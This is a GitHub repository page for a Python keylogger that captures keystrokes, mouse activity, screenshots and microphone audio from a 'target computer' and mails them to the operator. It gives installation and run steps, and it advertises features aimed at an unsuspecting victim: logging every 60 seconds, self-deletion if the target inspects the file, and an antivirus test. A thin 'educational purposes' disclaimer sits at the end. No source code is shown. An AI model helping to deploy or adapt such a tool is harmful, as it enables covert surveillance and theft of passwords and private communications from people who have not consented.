Skip to content

Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.

License

Notifications You must be signed in to change notification settings

aydinnyunus/Keylogger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 Cannot retrieve latest commit at this time.

History

67 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Inputs To Mail.

Get Keyboard,Mouse,ScreenShot,Microphone Inputs and Send to your Mail. Purpose of the project is testing the security of information systems

Installation and Usage

• Create an account on "https://mailtrap.io/" using a temp mail

github-small

• Set your own SMTP USERNAME and SMTP PASSWORD in keylogger.py.

• Create python virtual environment by running the following command

python3 -m venv venv
source venv/bin/activate

• Install the dependencies

pip3 install -r requirements.txt

• Run the script

python3 keylogger.py

github-small

Note: By default, all the data will be logged after every 60 seconds from the target machine.

The program is self-destructive. If the target discovers and opens the code file in their quest to learn your email and password, the program will automatically delete itself.

Anti-Virus Test

github-small

github-small


If you've found value in my tools and would like to support my ongoing creative endeavors, I would greatly appreciate your contribution to my BTC Wallet: 1NqDy1VdF5wkvxBcojbADWexPhPzza6LGF. Your generosity will not only motivate me but also help foster further growth. If you're in a position to do so, I'd be delighted if you could treat me to a coffee. Your kindness is truly appreciated! 😊🎉


Contact Me !


Other Projects:

Whatsapp Bot: https://github.com/aydinnyunus/WhatsappBOT

Machine Learning: https://github.com/aydinnyunus/Machine-Learning

Face Recognition Security: https://github.com/aydinnyunus/FaceRecognitionSecurity


Legality: This was a program designed for educational purposes only. I do not accept any responsiblity for the usage of the software for illegal or malicious purposes, nor do I condone it.